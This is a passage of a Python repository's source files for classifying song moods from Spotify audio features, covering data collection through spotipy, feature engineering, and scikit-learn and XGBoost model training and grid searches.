'Tempo', 'TimeSignature', 'KeyMode', 'TempoMode', 'Beats',\n 'Energy', 'Acousticness', 'LoudnessSq']\n\n\naudio_features = ['timavg_5', 'timavg_3', 'pitch_1', 'timavg_1', 'pitch_0', 'pitch_8', 'pitch_5', 'timavg_0',\n 'pitch_10', 'pitch_6', 'pitch_2', 'timavg_4', 'pitch_11', 'pitch_3', 'pitch_7', 'timavg_7',\n 'timavg_9', 'pitch_9', 'pitch_4', 'timavg_10', 'timavg_2', 'timavg_6', 'timavg_8', 'timavg_11']\n\n\nfeatures = audio_features + qual_features\n\n\ndef plot_learning_curve(estimator, title, X, y, ylim=None, cv=None,\n n_jobs=1):\n plt.figure()\n plt.title(title)\n\n if ylim is not None:\n plt.ylim(*ylim)\n plt.xlabel(\"Training examples\")\n plt.ylabel(\"Score\")\n\n train_sizes, train_scores, test_scores = learning_curve(estimator=estimator, X=X, y=y, cv=cv, n_jobs=n_jobs)\n\n train_scores_mean = np.mean(train_scores, axis=1)\n train_scores_std = np.std(train_scores, axis=1)\n test_scores_mean = np.mean(test_scores, axis=1)\n test_scores_std = np.std(test_scores, axis=1)\n plt.grid()\n plt.fill_between(train_sizes, train_scores_mean - train_scores_std,\n train_scores_mean+train_scores_std, alpha=0.1, color='r')\n plt.fill_between(train_sizes, test_scores_mean - test_scores_std,\n test_scores_mean + test_scores_std, alpha=0.1, color='r')\n plt.plot(train_sizes, train_scores_mean, 'o-', color='r', label=\"Training score\")\n plt.plot(train_sizes, test_scores_mean, 'o-', color='b', label=\"Cross validation score\")\n plt.legend(loc='best')\n\n return plt\n\n\nX, y = train[features], train['Mood']\n\ncv = ShuffleSplit(n_splits=15, test_size=0.4, random_state=0)\ntitle = \"Learning Curves (SVM, RBF kernel, $\\gamma=3$)\"\nestimator = SVC(kernel='linear', gamma=3)\n\nplot_learning_curve(estimator, title, X, y, (0, 1.01), cv, n_jobs=4)\n\nplt.show()" }, { "alpha_fraction": 0.6215686202049255, "alphanum_fraction": 0.6313725709915161, "avg_line_length": 41.5, "blob_id": "e635128a82e597d3fc7cc3b17ec1bc6aa97e7314", "content_id": "7a45c91d2e5e3c0b7bb794a70f4da49b1f092292", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1530, "license_type": "no_license", "max_line_length": 189, "num_lines": 36, "path": "/src/spotify_audio_features.py", "repo_name": "ashish3805/JoyDivision", "src_encoding": "UTF-8", "text": "from spotipy.oauth2 import SpotifyClientCredentials\nimport spotipy\nfrom time import time\nimport pandas as pd\n\nclient_credentials_manager = SpotifyClientCredentials(client_id=YOUR_CLIENT_ID, client_secret=YOUR_CLIENT_SECRET)\nsp = spotipy.Spotify(client_credentials_manager=client_credentials_manager)\nsp.trace=True\n\nalltracks = pd.read_csv('../data/trackids_new_2.csv', sep=';', header=0)\ntracklist = alltracks[alltracks['TrackID'] != 'Not Found']\ntracklist = tracklist['TrackID'].tolist()\nprint len(tracklist)\nchunks = [tracklist[x:x+49] for x in xrange(0, len(tracklist), 49)]\n\n\nstart = time()\n\nwith open('../data/audiofeatures3.csv', 'w') as out:\n for idx, chunk in enumerate(chunks):\n print \"Chunk {} has length {}\".format(idx, len(chunk))\n features = sp.audio_features(chunk)\n for i in range(len(features)):\n try:\n energy = features[i]['energy']\n speechiness = features[i]['speechiness']\n valence = features[i]['valence']\n danceability = features[i]['danceability']\n acousticness = features[i]['acousticness']\n instrumentalness = features[i]['instrumentalness']\n out.write(chunk[i] + \";\" + str(energy) +\";\" + str(speechiness) + \";\" + str(valence) + \";\" + str(danceability) + \";\" + str(acousticness) + \";\" + str(instrumentalness) + \"\\n\")\n except TypeError:\n out.write(chunk[i] + \";0;0;0;0;0;0 \\n\")\nout.close()\n\nprint \"Elapsed time in seconds: \", time() - start\n" }, { "alpha_fraction": 0.69554203748703, "alphanum_fraction": 0.7071934938430786, "avg_line_length": 33.017242431640625, "blob_id": "142ef99026a4cc1c4f65e09f3353544163f5aebe", "content_id": "503a5654b2e5963a51ffcb2320bbed29d3f6fab0", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1974, "license_type": "no_license", "max_line_length": 125, "num_lines": 58, "path": "/src/rfe.py", "repo_name": "ashish3805/JoyDivision", "src_encoding": "UTF-8", "text": "print(__doc__)\n\nimport matplotlib.pyplot as plt\nfrom sklearn.ensemble import RandomForestClassifier\nfrom sklearn.model_selection import KFold\nfrom sklearn.feature_selection import RFECV\nfrom get_train_test import train\nfrom time import time\n\n\ntimbre_avg = [col for col in list(train.columns.values) if col.startswith('timavg_')]\ntimbre = [col for col in list(train.columns.values) if col.startswith('tim_')]\npitch_col = [col for col in list(train.columns.values) if col.startswith('pitch_')]\ndesc_features = ['Energy', 'Tempo', 'LoudnessSq', 'Acousticness', 'Instrumentalness', 'Speechiness', 'Danceability', 'Beats']\nnotational_features = ['Mode', 'KeyMode', 'TimeSignature', 'TempoMode', 'Beats']\ntop_4_timbre = ['timavg_1', 'timavg_2', 'timavg_3', 'timavg_4']\n\nfeatures = timbre_avg + pitch_col + desc_features + notational_features\n\nstart = time()\n\n# Create the RFE object and compute a cross-validated score.\nrfc = RandomForestClassifier(bootstrap=True, class_weight=None, criterion='gini',\n max_depth=15, max_features='auto', max_leaf_nodes=None,\n min_impurity_split=1e-07, min_samples_leaf=1,\n min_samples_split=2, min_weight_fraction_leaf=0.0,\n n_estimators=500, n_jobs=1, oob_score=False, random_state=None,\n verbose=0, warm_start=False)\n\nX = train[features]\ny = train['Mood']\n\n\nrfecv = RFECV(estimator=rfc, step=1, cv=KFold(5),\n scoring='accuracy')\n\nrfecv.fit(X, y)\n\nprint(\"Optimal number of features : %d\" % rfecv.n_features_)\n\n\nprint (\"Ranking of features\")\nranked = [rfecv.ranking_[i] for i in range(len(rfecv.ranking_))]\nprint ranked\n\n# Plot number of features VS. cross-validation scores\nplt.figure()\nplt.xlabel(\"Number of features selected\")\nplt.ylabel(\"Cross validation score (nb of correct classifications)\")\nplt.plot(range(1, len(rfecv.grid_scores_) + 1), rfecv.grid_scores_)\nplt.show()\n\n\nprint \"Support\", rfecv.support_\nprint rfecv.grid_scores_\n\n\nprint \"Elapsed time: \", time()-start\n\n" }, { "alpha_fraction": 0.7151079177856445, "alphanum_fraction": 0.729496419429779, "avg_line_length": 34.64102554321289, "blob_id": "6c102583df3e19d6d67a843f553849854ba6bc0c", "content_id": "feba9f8a1d6cb976fa3275d5524e18fe9ca8bef5", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1390, "license_type": "no_license", "max_line_length": 126, "num_lines": 39, "path": "/src/gridsearch_extratrees.py", "repo_name": "ashish3805/JoyDivision", "src_encoding": "UTF-8", "text": "from get_train_test import train\nfrom sklearn.metrics import accuracy_score, make_scorer\nfrom time import time\nimport subprocess\nfrom sklearn.ensemble import ExtraTreesClassifier\nfrom sklearn.model_selection import GridSearchCV, KFold, cross_val_score\n\nqual_features = ['Danceability', 'Speechiness', 'Instrumentalness', 'Beats',\n 'Energy', 'Acousticness', 'LoudnessSq']\n\n\npitches = [col for col in list(train.columns.values) if col.startswith('pitch_')]\ntimbres = [col for col in list(train.columns.values) if col.startswith('timavg_')]\n\naudio_features = pitches + timbres\n\nfeatures = audio_features + qual_features\n\n\nxtra_params = {\"n_estimators\":[10, 50, 100, 500, 700], \"max_depth\":[7, 10, 15], \"max_features\":['auto', 'sqrt', 'log2', None]}\n\nstart = time()\naccuracy = make_scorer(accuracy_score)\n\nxtra_grid = GridSearchCV(estimator=ExtraTreesClassifier(), param_grid=xtra_params, scoring=accuracy, cv=5)\nxtra_grid.fit(train[features], train['Mood'])\n\n\nprint \"Extra Trees grid search: \"\nprint \"CV results\", xtra_grid.cv_results_\nprint \"Best Extra Trees\", xtra_grid.best_estimator_\nprint \"Best CV score for Extra Trees\", xtra_grid.best_score_\nprint \"Best Extra Trees params:\", xtra_grid.best_params_\n\n\nprint \"Finished in: \", (time() - start)\n\nsubprocess.call(['speech-dispatcher']) #start speech dispatcher\nsubprocess.call(['spd-say', '\"your process has finished\"'])\n" }, { "alpha_fraction": 0.7265372276306152, "alphanum_fraction": 0.7281553149223328, "avg_line_length": 24.72916603088379, "blob_id": "5dbfda101dee353cfced64f44cecd3107a8d0615", "content_id": "93aa85a163c6e5b146a38c0b5688685075067983", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1236, "license_type": "no_license", "max_line_length": 82, "num_lines": 48, "path": "/src/svm.py", "repo_name": "ashish3805/JoyDivision", "src_encoding": "UTF-8", "text": "from get_train_test import train, test\nfrom sklearn.svm import SVC\nimport numpy as np\nfrom sklearn.metrics import accuracy_score, confusion_matrix\nfrom time import time\nimport seaborn as sns\nimport matplotlib.pyplot as plt\nfrom sklearn.preprocessing import StandardScaler as scaler\n\nqual_features = ['Danceability', 'Speechiness', 'Instrumentalness', 'Beats',\n 'Energy', 'Acousticness', 'LoudnessSq']\n\n\npitches = [col for col in list(train.columns.values) if col.startswith('pitch_')]\ntimbres = [col for col in list(train.columns.values) if col.startswith('timavg_')]\n\naudio_features = pitches + timbres\n\nfeatures = audio_features + qual_features\n\nX = train[features]\ny = train['Mood']\n\nX_test = test[features]\ny_test = test['Mood']\n\n\n# Scaling all numeric features for SVMs\ntrain[features] = scaler.fit_transform(train[features])\ntest[features] = scaler.fit_transform(test[features])\n\n\nstart = time()\n\nclf = SVC(kernel='linear', C=3, gamma=3)\n# clf.fit(X_train, y_train)\nclf.fit(X,y)\ny_pred = clf.predict(X_test)\n\ncfm = confusion_matrix(y_test, y_pred)\nprint cfm\nsns.heatmap(cfm, annot=True, fmt='d', cmap=\"YlGnBu\")\n# plt.show()\n\nprint accuracy_score(y_test, y_pred)\nprint \"Time elapased\", time() - start\n\nprint features\n\n" }, { "alpha_fraction": 0.6377816200256348, "alphanum_fraction": 0.6412478089332581, "avg_line_length": 21.153846740722656, "blob_id": "3bdd3e79bec1e8c8e2ca016f2379f40a68c73c95", "content_id": "8da9f5e0002c4aa415f2120ac4fef86b1bed9476", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 577, "license_type": "no_license", "max_line_length": 50, "num_lines": 26, "path": "/src/train_test_split.py", "repo_name": "ashish3805/JoyDivision", "src_encoding": "UTF-8", "text": "import pandas as pd\nimport numpy as np\n\n\ndata = pd.read_pickle('../data/fullset.pkl')\n\n# Partition dataset to get a train and test set\n# track_info = data[['File', 'Artist', 'Title']]\n# track_info.to_csv('../data/tracks.csv', sep=';')\n\nmask = np.random.rand(len(data)) < 0.6\n\ntrain = data[mask]\ntest = data[~mask]\n\nprint \"Train--------\"\nhappy_train = train['Mood'] == 'happy'\nprint happy_train.value_counts()\n\nprint \"Test----------\"\nhappy_test = test['Mood'] == 'happy'\nprint happy_test.value_counts()\n\n\ntrain.to_pickle('../data/train.pkl')\ntest.to_pickle('../data/test.pkl')\n\n" }, { "alpha_fraction": 0.703484058380127, "alphanum_fraction": 0.7220163345336914, "avg_line_length": 34.5, "blob_id": "7f93bdc56181bda65eaf834c3b6003524c08db26", "content_id": "c17aca0fe59094ffc02516a45ff46382263f34d6", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1349, "license_type": "no_license", "max_line_length": 128, "num_lines": 38, "path": "/src/gridsearch_ada.py", "repo_name": "ashish3805/JoyDivision", "src_encoding": "UTF-8", "text": "from get_train_test import train\nfrom sklearn.metrics import accuracy_score, make_scorer\nfrom time import time\nimport subprocess\nfrom sklearn.ensemble import AdaBoostClassifier\nfrom sklearn.model_selection import GridSearchCV, KFold, cross_val_score\n\nqual_features = ['Danceability', 'Speechiness', 'Instrumentalness', 'Beats',\n 'Energy', 'Acousticness', 'LoudnessSq']\n\n\npitches = [col for col in list(train.columns.values) if col.startswith('pitch_')]\ntimbres = [col for col in list(train.columns.values) if col.startswith('timavg_')]\n\naudio_features = pitches + timbres\n\nfeatures = audio_features + qual_features\n\nstart = time()\n\naccuracy = make_scorer(accuracy_score)\n\nab_params = {\"n_estimators\": [50, 100, 150, 300, 500], \"learning_rate\": [0.1, 0.01, 0.001, 1], \"algorithm\":['SAMME', 'SAMME.R']}\n\nab_grid = GridSearchCV(estimator=AdaBoostClassifier(), param_grid=ab_params, scoring=accuracy, cv = 5)\nab_grid.fit(train[features], train['Mood'])\n\nprint \"Ada Boost grid search: \"\nprint \"CV results\", ab_grid.cv_results_\nprint \"Best Ada\", ab_grid.best_estimator_\nprint \"Best CV score for Ada\", ab_grid.best_score_\nprint \"Best Ada params:\", ab_grid.best_params_\n\n\nprint \"Finished in: \", (time() - start)\n\nsubprocess.call(['speech-dispatcher']) #start speech dispatcher\nsubprocess.call(['spd-say', '\"your process has finished\"'])\n" }, { "alpha_fraction": 0.7034246325492859, "alphanum_fraction": 0.7143835425376892, "avg_line_length": 36.35897445678711, "blob_id": "5a0bcfb4bcf1386a65d5b2fac0f379ea0a271329", "content_id": "27d3b446dfbe78fa602b89aa42105677a9dba7ad", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1460, "license_type": "no_license", "max_line_length": 116, "num_lines": 39, "path": "/src/feature_importance.py", "repo_name": "ashish3805/JoyDivision", "src_encoding": "UTF-8", "text": "import numpy as np\nimport matplotlib.pyplot as plt\nfrom sklearn.ensemble import ExtraTreesClassifier\nfrom get_train_test import train\n\ntimbre_avg = [col for col in list(train.columns.values) if col.startswith('timavg_')]\ntimbre = [col for col in list(train.columns.values) if col.startswith('tim_')]\npitch_col = [col for col in list(train.columns.values) if col.startswith('pitch_')]\ndesc_features = ['Energy', 'Tempo', 'LoudnessSq', 'Acousticness', 'Instrumentalness', 'Speechiness', 'Danceability']\nnotational_features = ['Mode', 'KeyMode', 'TimeSignature', 'TempoMode', 'Beats']\ntop_4_timbre = ['timavg_1', 'timavg_2', 'timavg_3', 'timavg_4']\n\nfeatures = timbre_avg + pitch_col + desc_features + notational_features\n\nX = train[features]\ny = train['Mood']\n\n\nforest = ExtraTreesClassifier(n_estimators=250)\nforest.fit(X,y)\n\nimportances = forest.feature_importances_\nstd = np.std([tree.feature_importances_ for tree in forest.estimators_], axis=0)\nindices = np.argsort(importances)[::-1]\n\nfeatures_neworder = [features[i] for i in indices]\n\nprint features_neworder\nprint (\"Feature ranking:\")\n\nfor f in range(X.shape[1]):\n print (\"%d. feature %d %s (%f)\" % (f + 1, indices[f], features[indices[f]], importances[indices[f]]))\n\nplt.figure()\nplt.title(\"Feature importance\")\nplt.bar(range(X.shape[1]), importances[indices], color=\"b\", yerr=std[indices], align=\"center\")\nplt.xticks(range(X.shape[1]), features_neworder)\nplt.xlim([-1, X.shape[1]])\nplt.show()\n\n\n\n" }, { "alpha_fraction": 0.5654545426368713, "alphanum_fraction": 0.5690909028053284, "avg_line_length": 32, "blob_id": "db60cac4f9ceb7a6e17faa90a3414926c2296805", "content_id": "720736cee596fab83c5ec95d95544561b5f72415", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1650, "license_type": "no_license", "max_line_length": 113, "num_lines": 50, "path": "/src/spotify.py", "repo_name": "ashish3805/JoyDivision", "src_encoding": "UTF-8", "text": "import spotipy\nimport pprint\nimport csv\nfrom time import time\nimport pandas as pd\nimport subprocess\nimport requests\nimport sys\n\n# songs_A = pd.read_pickle('../temp/songs_A.pkl')\n# songs_B = pd.read_pickle('../temp/songs_B.pkl')\n#\n#\n# all_songs = pd.concat([songs_A, songs_B])\n#\n# all_songs[['File', 'Artist', 'Title']].to_csv('../data/pending_trackids2.csv', sep=';')\n#\n# print \"pending_trackids2.csv created.\"\n\nspotify = spotipy.Spotify()\n\n\nstart = time()\n\nwith open('../data/pending_trackids2.csv') as f:\n with open('../data/trackids_new.csv', 'w') as out:\n reader = csv.DictReader(f, fieldnames=['No', 'File', 'Artist', 'Title'], delimiter=';')\n for row in reader:\n print(row['Artist'], row['Title'])\n try:\n results = spotify.search(q='artist:'+row['Artist']+' track:'+row['Title'], type='track', limit=3)\n trackid = str(results['tracks']['items'][0]['id'])\n out.write(row['File'] + \";\" + row['Artist'] + \";\" + row['Title'] + \";\" + trackid + '\\n')\n except IndexError:\n out.write(row['File'] + \";\" + row['Artist'] + \";\" + row['Title'] + \";\" + \"Not Found\" + '\\n')\n except requests.exceptions.HTTPError as err:\n print err\n sys.exit(1)\n except requests.ConnectionError as err:\n print err\n except spotipy.client.SpotifyException as sp:\n print sp\n f.close()\n out.close()\n\nprint \"Elapsed time: \", time() - start\n\n\nsubprocess.call(['speech-dispatcher']) #start speech dispatcher\nsubprocess.call(['spd-say', '\"your process has finished\"'])\n" }, { "alpha_fraction": 0.7126436829566956, "alphanum_fraction": 0.7126436829566956, "avg_line_length": 27.66666603088379, "blob_id": "48f9f1151e6ffb8ade4ce7fb01e4bd7035171dc2", "content_id": "3cd355d474289818ec75ad2cbce1ebbdbf4af5ce", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "SQL", "length_bytes": 87, "license_type": "no_license", "max_line_length": 42, "num_lines": 3, "path": "/explore/getting_labels.sql", "repo_name": "ashish3805/JoyDivision", "src_encoding": "UTF-8", "text": "select d.Track, d.Mood, s.* from dataset d\ninner join subset s\nwhere s.File = d.Track\n\n" }, { "alpha_fraction": 0.6483610272407532, "alphanum_fraction": 0.6598552465438843, "avg_line_length": 29.705883026123047, "blob_id": "343822be0c4c36952a6ae6418461773ba1b798a0", "content_id": "c603ab72a15463b50f4a40dc513d38ec6a7ae4f2", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4698, "license_type": "no_license", "max_line_length": 110, "num_lines": 153, "path": "/src/create_dataset.py", "repo_name": "ashish3805/JoyDivision", "src_encoding": "UTF-8", "text": "import pandas as pd\nimport numpy as np\n\n\nnumerical = ['Tempo', 'Loudness', 'Energy', 'Speechiness', 'Danceability', 'Acousticness', 'Instrumentalness']\n\ntrackids = pd.read_csv('../data/trackids.csv', sep=';')\nfeatures = pd.read_csv('../data/features.csv', sep=';')\nsubset = pd.read_pickle('../data/subset.pkl')\nlabels = pd.read_csv('../data/labels.csv', sep=';')\n\nmaster = pd.merge(subset, trackids, on='File', how='inner')\nmaster = pd.merge(master, features, on='TrackID', how='inner')\nmaster = pd.merge(master, labels, on='File', how='inner')\nmaster = master.rename(index=str, columns={\"Artist_x\": \"Artist\", \"Title_x\": \"Title\"})\n\n\ntrackids_2 = pd.read_csv('../data/trackids_new_2.csv', sep=';')\nfeatures_2 = pd.read_csv('../data/features_2.csv', sep=';')\nsubset_2 = pd.read_pickle('../data/newsubset.pkl')\n\nd = pd.merge(subset_2, trackids_2, on='File', how='inner')\nd = pd.merge(d, features_2, on='TrackID', how='inner')\n\nd = d.rename(index=str, columns={\"Artist_x\": \"Artist\", \"Title_x\": \"Title\"})\nmaster = pd.concat([master, d])\nmaster = master.drop_duplicates(subset=['File', 'Artist', 'Title'], keep='first')\n\nmaster['KeyMode'] = master['Key'] * master['Mode']\nmaster['LoudnessSq'] = master['Loudness'] * master['Loudness']\nmaster['TempoMode'] = master['Tempo'] * master['Mode']\n\n\n# Impute missing values\nmaster['Energy'].fillna(master['Energy'].mean(), inplace=True)\nmaster['Danceability'].fillna(master['Danceability'].mean(), inplace=True)\nmaster['Acousticness'].fillna(master['Acousticness'].mean(), inplace=True)\nmaster['Valence'].fillna(master['Valence'].mean(), inplace=True)\nmaster['Instrumentalness'].fillna(master['Instrumentalness'].mean(), inplace=True)\nmaster['Speechiness'].fillna(master['Speechiness'].mean(), inplace=True)\n\n\n\n# Create segment features\n\ndef get_shape(x):\n return x.shape[0]\n\n\n# timbre features of shape (1, 90)\ndef compute_timbre_feature(x):\n features = x.T\n x = features.shape[1]\n y = features.shape[0]\n assert y == 12, \"Transpose error - wrong dimension\"\n #finaldim = 90\n if x < 3:\n print \"flen < 3\"\n return None\n avg = np.average(features, 1)\n cov = np.cov(features)\n covflat = []\n for k in range(12):\n covflat.extend(np.diag(cov, k))\n covflat = np.array(covflat, dtype=object)\n # concatenate avg and cov\n f = np.concatenate([avg, covflat])\n f = list(f)\n return f\n\n\n# pitch average feature vector of size (1, 12)\ndef compute_pitch_feature(x):\n features = x.T\n x = features.shape[1]\n y = features.shape[0]\n assert y == 12, \"Transpose error - wrong dimension\"\n if x < 3:\n print \"flen < 3\"\n return None\n avg = np.average(features, 1)\n f = list([avg])\n return avg\n\n\n# timbre average feature vector of size(1, 12)\ndef compute_timbre_average(x):\n features = x.T\n flen = features.shape[1]\n ndim = features.shape[0]\n assert ndim == 12, \"Transpose error - wrong dimension\"\n finaldim = 90\n if flen < 3:\n print \"flen < 3\"\n return None\n avg = np.average(features, 1)\n return avg\n\n\nmaster['TimbreVector'] = master['Timbre'].apply(lambda x: compute_timbre_feature(x))\nmaster['PitchVector'] = master['Pitches'].apply(lambda x: compute_pitch_feature(x))\nmaster['TimbreAverage'] = master['Timbre'].apply(lambda x: compute_timbre_average(x))\n\n\ntimbrevec = master['TimbreVector'].apply(pd.Series)\ntimbrevec = timbrevec.rename(columns = lambda x: 'tim_'+str(x))\nmaster = pd.concat([master[:], timbrevec[:]], axis=1)\n\ntimbreavg = master['TimbreAverage'].apply(pd.Series)\ntimbreavg = timbreavg.rename(columns= lambda x: 'timavg_'+str(x))\nmaster = pd.concat([master[:], timbreavg[:]], axis=1)\n\npitchvec = master['PitchVector'].apply(pd.Series)\npitchvec = pitchvec.rename(columns = lambda x: 'pitch_'+str(x))\nmaster = pd.concat([master[:], pitchvec[:]], axis=1)\n\n\nmaster['Beats'] = master['BeatsConfidence'].apply(lambda x: get_shape(x))\n\n# Echonest Analyse Docs\n# AvgLoudnessTimbre' - timavg_1\n# AvgBrightnessTimbre' - timavg_2\n# AvgFlatnessTimbre'- timavg_3'\n# AvgAttackTimbre' - timavg_4'\n\n\nmaster.to_pickle('../data/fullset.pkl')\nmaster.to_csv('../data/fullset.csv')\n\n# Create train and test sets\n\ndata = pd.read_pickle('../data/fullset.pkl')\n\n# Partition dataset to get a train and test set\n# track_info = data[['File', 'Artist', 'Title']]\n# track_info.to_csv('../data/tracks.csv', sep=';')\n\nmask = np.random.rand(len(data)) < 0.6\n\ntrain = data[mask]\ntest = data[~mask]\n\nprint \"Train--------\"\nhappy_train = train['Mood'] == 'happy'\nprint happy_train.value_counts()\n\nprint \"Test----------\"\nhappy_test = test['Mood'] == 'happy'\nprint happy_test.value_counts()\n\n\ntrain.to_pickle('../data/train.pkl')\ntest.to_pickle('../data/test.pkl')\n" }, { "alpha_fraction": 0.6379605531692505, "alphanum_fraction": 0.6529563069343567, "avg_line_length": 38.50847625732422, "blob_id": "19f9bd5d5794f0a531d5579ffbf42c3f25fc0293", "content_id": "361816e8ff7b32ab31b3d7d9ac36fdcf04c1381a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2334, "license_type": "no_license", "max_line_length": 116, "num_lines": 59, "path": "/src/feature_combinations.py", "repo_name": "ashish3805/JoyDivision", "src_encoding": "UTF-8", "text": "import pandas as pd\nimport numpy as np\nfrom get_train_test import train\nfrom sklearn.ensemble import ExtraTreesClassifier\nimport matplotlib.pyplot as plt\nfrom time import time\n\ntimbre_avg = [col for col in list(train.columns.values) if col.startswith('timavg_')]\ntimbre = [col for col in list(train.columns.values) if col.startswith('tim_')]\npitch_col = [col for col in list(train.columns.values) if col.startswith('pitch_')]\ndesc_features = ['Energy', 'Tempo', 'LoudnessSq', 'Acousticness', 'Instrumentalness', 'Speechiness', 'Danceability']\nnotational_features = ['Mode', 'KeyMode', 'TimeSignature', 'TempoMode', 'Beats']\ntop_4_timbre = ['timavg_1', 'timavg_2', 'timavg_3', 'timavg_4']\n\ncomb1 = pitch_col + desc_features + notational_features\ncomb2 = top_4_timbre + desc_features\ncomb3 = desc_features + notational_features\ncomb4 = pitch_col + top_4_timbre + desc_features\ncomb5 = desc_features\n\ncombinations = [comb1, comb2, comb3, comb4, comb5]\n\ncombination_desc = [\"Combination 1 - top 4 timbres, pitch averages, desc and notational features\",\n \"Combination 2- Top 4 timbres and Desc features\",\n \"Combination 3 - Notational features & Desc features\"\n \"Combination 4 - Pitch, Timbre and Desc\",\n \"Combination 5 - Desc features only\"]\n\n\nfor idx, c in enumerate(combinations):\n X = train[c]\n y = train['Mood']\n\n forest = ExtraTreesClassifier(n_estimators=250)\n forest.fit(X,y)\n\n importances = forest.feature_importances_\n std = np.std([tree.feature_importances_ for tree in forest.estimators_], axis=0)\n indices = np.argsort(importances)[::-1]\n\n features_neworder = [c[i] for i in indices]\n\n print combination_desc[idx]\n print features_neworder\n print (\"Feature ranking:\")\n\n for f in range(X.shape[1]):\n print (\"%d. feature %d %s (%f)\" % (f + 1, indices[f], c[indices[f]], importances[indices[f]]))\n\n plt.figure()\n plt.title(\"Feature importance\")\n plt.bar(range(X.shape[1]), importances[indices], color=\"b\", yerr=std[indices], align=\"center\")\n plt.xticks(range(X.shape[1]), features_neworder)\n plt.xlim([-1, X.shape[1]])\n filename = '../explore/combination_{}_features.png'.format(idx)\n plt.savefig(filename)\n\n\nprint \" -------------------------------------------------------------------\"\n\n\n\n" }, { "alpha_fraction": 0.6972347497940063, "alphanum_fraction": 0.7054662108421326, "avg_line_length": 35.3317756652832, "blob_id": "74642974842460fc3b4aae958f377452284b8296", "content_id": "6a8c957f85742003cd4cace85abc97068ba4b928", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 7775, "license_type": "no_license", "max_line_length": 147, "num_lines": 214, "path": "/src/models.py", "repo_name": "ashish3805/JoyDivision", "src_encoding": "UTF-8", "text": "from get_train_test import train\nfrom sklearn.model_selection import GridSearchCV\nfrom sklearn.ensemble import RandomForestClassifier, GradientBoostingClassifier, AdaBoostClassifier, ExtraTreesClassifier\nfrom sklearn.svm import SVC\nfrom sklearn.naive_bayes import GaussianNB\nfrom sklearn.neighbors import KNeighborsClassifier\nimport xgboost as xgb\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.metrics import classification_report, accuracy_score\nimport pandas as pd\nimport seaborn as sns\nimport matplotlib.pyplot as plt\nfrom time import time\nimport subprocess\n\nstart = time()\n\nqual_features = ['Danceability', 'Speechiness', 'Instrumentalness', 'Beats',\n 'Energy', 'Acousticness', 'LoudnessSq']\n\n\npitches = [col for col in list(train.columns.values) if col.startswith('pitch_')]\ntimbres = [col for col in list(train.columns.values) if col.startswith('timavg_')]\n\naudio_features = pitches + timbres\n\nfeatures = audio_features + qual_features\nprint features\n\nX = train[features]\ny = train['Mood']\n\n\nX_qual = train[qual_features]\nX_audio = train[audio_features]\n\n\n#ensemble models\n\nmodels = {}\n\n\nprint \"Training on all features\"\nX_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.3, random_state=1010)\n\n\nmodels['RFC'] = RandomForestClassifier(n_estimators=300)\nmodels['XGB'] = xgb.XGBClassifier(max_depth=3, n_estimators=300, learning_rate=0.05)\nmodels['GBC'] = GradientBoostingClassifier()\nmodels['ABC'] = AdaBoostClassifier()\nmodels['ETC'] = ExtraTreesClassifier()\n\n\nfor name, model in models.iteritems():\n model.fit(X_train, y_train)\n print name\n print classification_report(y_test, model.predict(X_test))\n print \"Accuracy: \", accuracy_score(y_test, model.predict(X_test))\n print '\\n'\n\n\nfeature_importances = pd.DataFrame()\n\nfor name, model in models.iteritems():\n df = pd.DataFrame(data = model.feature_importances_, index = X_test.columns, columns = [name]).transpose()\n feature_importances = feature_importances.append(df)\n\nfeature_importances = feature_importances.transpose()\nfeature_importances['average'] = (feature_importances['RFC'] + feature_importances['XGB'] + feature_importances['GBC'] + feature_importances['ABC']\n + feature_importances['ETC'])/5\n\nfeature_importances = feature_importances.sort_values('average', ascending = False).drop('average', axis=1)\n\n\nfig, axes = plt.subplots(figsize=(18,12))\nsns.set(rc={'axes.facecolor':'black', 'figure.facecolor':'black', 'axes.grid' : False, 'text.color': 'white',\n 'xtick.color': 'white', 'ytick.color': 'white', 'axes.labelcolor': 'white', 'axes.edgecolor': 'white'} )\nplt.xlabel('Models')\nplt.ylabel('Features')\nplt.title('Feature Importance by Estimator')\nheatmap = sns.heatmap(feature_importances, cmap = 'YlGnBu', cbar=False, annot=True)\nheatmap.set_yticklabels(heatmap.get_yticklabels(), rotation=0)\nheatmap.set(xlabel='Estimators', ylabel='Features')\nplt.savefig('../explore/feature_imp_all.png', dpi=300)\nplt.show()\n\n\n# other models\nsimple_models = {}\nsimple_models['SVM'] = SVC(kernel='linear')\nsimple_models['KNN'] = KNeighborsClassifier()\nsimple_models['NB'] = GaussianNB()\n\nfor name, model in simple_models.iteritems():\n model.fit(X_train, y_train)\n print name\n print classification_report(y_test, model.predict(X_test))\n print \"Accuracy: \", accuracy_score(y_test, model.predict(X_test))\n print '\\n'\n\nprint \"Elapsed time: \", time() - start\n\n\nprint \"Training on audio features only\"\n\nX_train, X_test, y_train, y_test = train_test_split(X_audio, y, test_size=0.3, random_state=1010)\n\n\nfor name, model in models.iteritems():\n model.fit(X_train, y_train)\n print name\n print classification_report(y_test, model.predict(X_test))\n print \"Accuracy: \", accuracy_score(y_test, model.predict(X_test))\n print '\\n'\n\n\nfeature_importances = pd.DataFrame()\n\nfor name, model in models.iteritems():\n df = pd.DataFrame(data = model.feature_importances_, index = X_test.columns, columns = [name]).transpose()\n feature_importances = feature_importances.append(df)\n\nfeature_importances = feature_importances.transpose()\nfeature_importances['average'] = (feature_importances['RFC'] + feature_importances['XGB'] + feature_importances['GBC'] + feature_importances['ABC']\n + feature_importances['ETC'])/5\n\nfeature_importances = feature_importances.sort_values('average', ascending = False).drop('average', axis=1)\n\n\nfig, axes = 